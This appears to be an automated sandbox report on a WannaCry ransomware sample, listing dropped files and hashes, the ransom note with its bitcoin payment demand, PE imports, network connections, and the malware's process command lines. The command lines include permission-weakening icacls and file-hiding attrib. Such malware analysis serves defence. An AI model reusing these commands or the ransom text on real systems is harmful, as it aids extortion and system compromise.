SHA-512:	C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
Malicious:	false
Reputation:	unknown
Preview:	BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\found.001\30000000-trans[1].gif.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	7.263146584286094
Encrypted:	false
SSDEEP:	6:bkEDCFLzILbFEmiQJo7xBEo30DS4kJnT8Shi9cgji/lqhLfhiBys:bkEeFLkLumiQJo7xBEfkdTFoo0LfwN
MD5:	A6A3CE455F20FFD9C1203D030F7BD762
SHA1:	CFF0BACDC67F8D2C06DAD04F2CB6DEF7C2CB4DEA
SHA-256:	FB476C1F0985E88E1650024BAB7796FC5506386A601859D8566EA42E20858906
SHA-512:	8EAD20A56426D57F262A6BB206863C617AA419D786FE3A33BDAA4B1AE548DE79A328E19578960DFFE69AFA9CEE5936421D20C8B6B535E149D7AF6D7B7D2B7C8C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....B3..r4g..Xw..!..i.a.....k.M..O.w.)R...2..m.....P.D....Z...r .74......wP9..Xy..i'}]..........}.D.}..D......j.._`...?*..G......:f.<.9.g..2g..e....Db(.['..}f.[......S.y..~...hW.\|.i7O....nF.....&vn5Wi.W.Uq......@.\|.......E7..4.@T........e....+.......u.......Di.dO70V.D\|m..%5....>{...~.?..V.g.L

C:\found.001\40000000-trans[2].gif.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	7.264274681548039
Encrypted:	false
SSDEEP:	6:bkEj5RpFbIPZPHdaFWwtjR3cL3hPlCL5uyJMGAUHvjoqK35fJlq2lJ2gFRZ:bkEj5PFbIP90cjhOBzUq+fJnlJLH
MD5:	58DCE869D18004DF6BAB201974D11663
SHA1:	40B15A6F2C85BE2F298BE7CD47BF79088F5C9A08
SHA-256:	59D226FE723AB3D1D908267CDF2A1623A7D0A43582AA16BA2FE7AC2A05503FFC
SHA-512:	6DA43D1D8963708ECAAA9E5A4FE4A750CEF7570E8A4B5FF1DB471428B165F77E4C70096E69C08607111E21861C2F3D7EAF8E5CB9DB6125D5CFCA5A461536BDBC
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......u..\|...[O..(....m...l.../Ks...8C.W\|....]..UF..!F.1.-.l3`.bdN3.u.9.0.LU...b}.tgU.ei,.c.....Ea..<........F..$..a,L.......K&^...b.4.....c.........&-o....\.c.r...Zm.X..6[...I ...Pz...b.7.<hw..v..r....\V....DU*)...T.......i....1.q.LY.~^g...z.A.....+.......xO...v.Oj.7$.,..&.......r./......\.\|[.G....&.

C:\found.001\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\found.001\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.305255793112395
Encrypted:	false
SSDEEP:	3:8yzGc7C1RREal:nzGtRV
MD5:	6ED2062D4FB53D847335AE403B23BE62
SHA1:	C3030ED2C3090594869691199F46BE7A9A12E035
SHA-256:	43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
SHA-512:	C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
Malicious:	false
Reputation:	unknown
Preview:	ERROR:...Description = Initialization failure...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.995470941164686
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Wannacry.exe
File size:	3'514'368 bytes
MD5:	84c82835a5d21bbcf75a61706d8ab549
SHA1:	5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512:	90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
SSDEEP:	98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
TLSH:	73F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4077ba
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	68f013d7437aa653a8a98a05807afeb1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040D488h
push 004076F4h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004081C4h]
pop ecx
or dword ptr [0040F94Ch], FFFFFFFFh
or dword ptr [0040F950h], FFFFFFFFh
call dword ptr [004081C0h]
mov ecx, dword ptr [0040F948h]
mov dword ptr [eax], ecx
call dword ptr [004081BCh]
mov ecx, dword ptr [0040F944h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004081B8h]
mov eax, dword ptr [eax]
mov dword ptr [0040F954h], eax
call 00007FAE2CC8DD3Bh
cmp dword ptr [0040F870h], ebx
jne 00007FAE2CC8DC2Eh
push 0040793Ch
call dword ptr [004081B4h]
pop ecx
call 00007FAE2CC8DD0Dh
push 0040E00Ch
push 0040E008h
call 00007FAE2CC8DCF8h
mov eax, dword ptr [0040F940h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0040F93Ch]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004081ACh]
push 0040E004h
push 0040E000h
call 00007FAE2CC8DCC5h

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5a8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x349fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x1d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69b0	0x7000	False	0.5747419084821429	data	6.404235106100747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x5f70	0x6000	False	0.5781656901041666	data	6.66357096840794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x1958	0x2000	False	0.394287109375	Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0	4.4557495078691405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x349fa0	0x34a000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
XIA	0x100f0	0x349635	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0002689361572266
RT_VERSION	0x359728	0x388	data	English	United States	0.46349557522123896
RT_MANIFEST	0x359ab0	0x4ef	exported SGML document, ASCII text, with CRLF line terminators	English	United States	0.42913697545526525

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll	wsprintfA
ADVAPI32.dll	CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll	realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 16, 2023 14:50:46.476416111 CEST	49722	443	192.168.11.20	78.142.142.246
Aug 16, 2023 14:50:46.476511955 CEST	443	49722	78.142.142.246	192.168.11.20
Aug 16, 2023 14:50:46.476584911 CEST	49723	443	192.168.11.20	194.109.206.212
Aug 16, 2023 14:50:46.476682901 CEST	443	49723	194.109.206.212	192.168.11.20
Aug 16, 2023 14:50:46.476747990 CEST	49722	443	192.168.11.20	78.142.142.246
Aug 16, 2023 14:50:46.476885080 CEST	49723	443	192.168.11.20	194.109.206.212
Aug 16, 2023 14:50:46.486696005 CEST	49722	443	192.168.11.20	78.142.142.246
Aug 16, 2023 14:50:46.486745119 CEST	443	49722	78.142.142.246	192.168.11.20
Aug 16, 2023 14:50:46.493282080 CEST	49723	443	192.168.11.20	194.109.206.212
Aug 16, 2023 14:50:46.493352890 CEST	443	49723	194.109.206.212	192.168.11.20
Aug 16, 2023 14:50:47.211649895 CEST	49724	9030	192.168.11.20	146.185.177.103
Aug 16, 2023 14:50:48.226660013 CEST	49724	9030	192.168.11.20	146.185.177.103
Aug 16, 2023 14:50:50.241808891 CEST	49724	9030	192.168.11.20	146.185.177.103
Aug 16, 2023 14:50:54.256558895 CEST	49724	9030	192.168.11.20	146.185.177.103
Aug 16, 2023 14:51:02.270400047 CEST	49724	9030	192.168.11.20	146.185.177.103
Aug 16, 2023 14:51:09.222714901 CEST	49727	443	192.168.11.20	163.172.157.213
Aug 16, 2023 14:51:09.222830057 CEST	443	49727	163.172.157.213	192.168.11.20
Aug 16, 2023 14:51:09.222881079 CEST	49728	443	192.168.11.20	199.254.238.52
Aug 16, 2023 14:51:09.222964048 CEST	443	49728	199.254.238.52	192.168.11.20
Aug 16, 2023 14:51:09.223103046 CEST	49728	443	192.168.11.20	199.254.238.52
Aug 16, 2023 14:51:09.223114967 CEST	49727	443	192.168.11.20	163.172.157.213
Aug 16, 2023 14:51:09.223406076 CEST	49727	443	192.168.11.20	163.172.157.213
Aug 16, 2023 14:51:09.223469019 CEST	443	49727	163.172.157.213	192.168.11.20
Aug 16, 2023 14:51:09.223542929 CEST	49728	443	192.168.11.20	199.254.238.52
Aug 16, 2023 14:51:09.223596096 CEST	443	49728	199.254.238.52	192.168.11.20
Aug 16, 2023 14:51:12.470459938 CEST	443	49728	199.254.238.52	192.168.11.20
Aug 16, 2023 14:52:46.170476913 CEST	49733	9001	192.168.11.20	212.47.237.95
Aug 16, 2023 14:52:47.184998989 CEST	49733	9001	192.168.11.20	212.47.237.95
Aug 16, 2023 14:52:49.200201988 CEST	49733	9001	192.168.11.20	212.47.237.95
Aug 16, 2023 14:52:53.214883089 CEST	49733	9001	192.168.11.20	212.47.237.95
Aug 16, 2023 14:52:57.500793934 CEST	443	49723	194.109.206.212	192.168.11.20
Aug 16, 2023 14:52:57.500828028 CEST	443	49722	78.142.142.246	192.168.11.20
Aug 16, 2023 14:53:01.228761911 CEST	49733	9001	192.168.11.20	212.47.237.95
Aug 16, 2023 14:53:17.319628954 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.319736004 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:17.319936991 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.320147038 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.320204020 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:17.412744045 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:17.413013935 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.414943933 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.414961100 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:17.415441990 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:17.415764093 CEST	49735	443	192.168.11.20	86.59.21.38
Aug 16, 2023 14:53:17.456083059 CEST	443	49735	86.59.21.38	192.168.11.20
Aug 16, 2023 14:53:20.024847031 CEST	443	49727	163.172.157.213	192.168.11.20
Aug 16, 2023 14:53:24.662190914 CEST	49737	9001	192.168.11.20	51.254.246.203
Aug 16, 2023 14:53:25.676609993 CEST	49737	9001	192.168.11.20	51.254.246.203
Aug 16, 2023 14:53:27.691700935 CEST	49737	9001	192.168.11.20	51.254.246.203
Aug 16, 2023 14:53:31.706585884 CEST	49737	9001	192.168.11.20	51.254.246.203
Aug 16, 2023 14:53:39.720370054 CEST	49737	9001	192.168.11.20	51.254.246.203
Aug 16, 2023 14:54:33.865200043 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:33.865351915 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:54:33.865590096 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:33.880546093 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:33.880605936 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:54:33.968604088 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:54:33.968888998 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:33.970738888 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:33.970752954 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:54:33.971100092 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:54:33.971460104 CEST	49740	443	192.168.11.20	131.188.40.189
Aug 16, 2023 14:54:34.012052059 CEST	443	49740	131.188.40.189	192.168.11.20
Aug 16, 2023 14:55:55.770339966 CEST	49743	443	192.168.11.20	5.39.92.199
Aug 16, 2023 14:55:55.770478010 CEST	443	49743	5.39.92.199	192.168.11.20
Aug 16, 2023 14:55:55.770648003 CEST	49743	443	192.168.11.20	5.39.92.199
Aug 16, 2023 14:55:55.784564018 CEST	49743	443	192.168.11.20	5.39.92.199
Aug 16, 2023 14:55:55.784631014 CEST	443	49743	5.39.92.199	192.168.11.20

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Wannacry.exePID: 2584, Parent PID: 5284

General

Target ID:	0
Start time:	14:48:40
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\Wannacry.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Wannacry.exe
Imagebase:	0x400000
File size:	3'514'368 bytes
MD5 hash:	84C82835A5D21BBCF75A61706D8AB549
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.813793076.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Analysis Process: attrib.exePID: 3344, Parent PID: 2584

General

Target ID:	2
Start time:	14:48:41
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h .
Imagebase:	0xe70000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 3480, Parent PID: 2584

General

Target ID:	3
Start time:	14:48:42
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls . /grant Everyone:F /T /C /Q
Imagebase:	0x20000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3580, Parent PID: 3344

General

Target ID:	4
Start time:	14:48:42
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3508, Parent PID: 3480

General

Target ID:	5
Start time:	14:48:42
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6205a0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 5472, Parent PID: 2584

General

Target ID:	6
Start time:	14:48:42
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 89%, ReversingLabs
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5988, Parent PID: 2584

General

Target ID:	7
Start time:	14:48:43
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 312151692193723.bat
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7136, Parent PID: 5988

General

Target ID:	8
Start time:	14:48:43
Start date:	16/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x970000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cscript.exePID: 1584, Parent PID: 5988

General

Target ID:	9
Start time:	14:48:43
Start date:	16/08/2023
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript.exe //nologo m.vbs
Imagebase:	0xd30000
File size:	144'896 bytes
MD5 hash:	13783FF4A2B614D7FBD58F5EEBDEDEF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: dllhost.exePID: 712, Parent PID: 708

General

Target ID:	10
Start time:	14:49:08
Start date:	16/08/2023
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff707cf0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 4160, Parent PID: 2584

General

Target ID:	11
Start time:	14:49:13
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 5276, Parent PID: 2584

General

Target ID:	19
Start time:	14:49:43
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskdl.exePID: 6672, Parent PID: 2584

General

Target ID:	22
Start time:	14:50:13
Start date:	16/08/2023
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: @WanaDecryptor@.exePID: 8616, Parent PID: 2584

General

Target ID:	27
Start time:	14:50:40
Start date:	16/08/2023
